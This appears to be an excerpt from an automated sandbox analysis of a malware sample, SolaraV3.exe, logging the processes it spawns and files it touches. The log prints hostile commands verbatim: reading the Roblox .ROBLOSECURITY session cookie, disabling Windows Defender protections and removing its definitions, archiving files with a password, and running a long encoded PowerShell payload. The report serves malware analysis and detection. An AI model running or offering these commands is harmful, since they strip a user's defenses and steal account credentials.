Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EEBB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

110_2_00007FF74EEBB340

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 1_2_00007FF6DC729570 cpuid

1_2_00007FF6DC729570

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformation	Jump to behavior
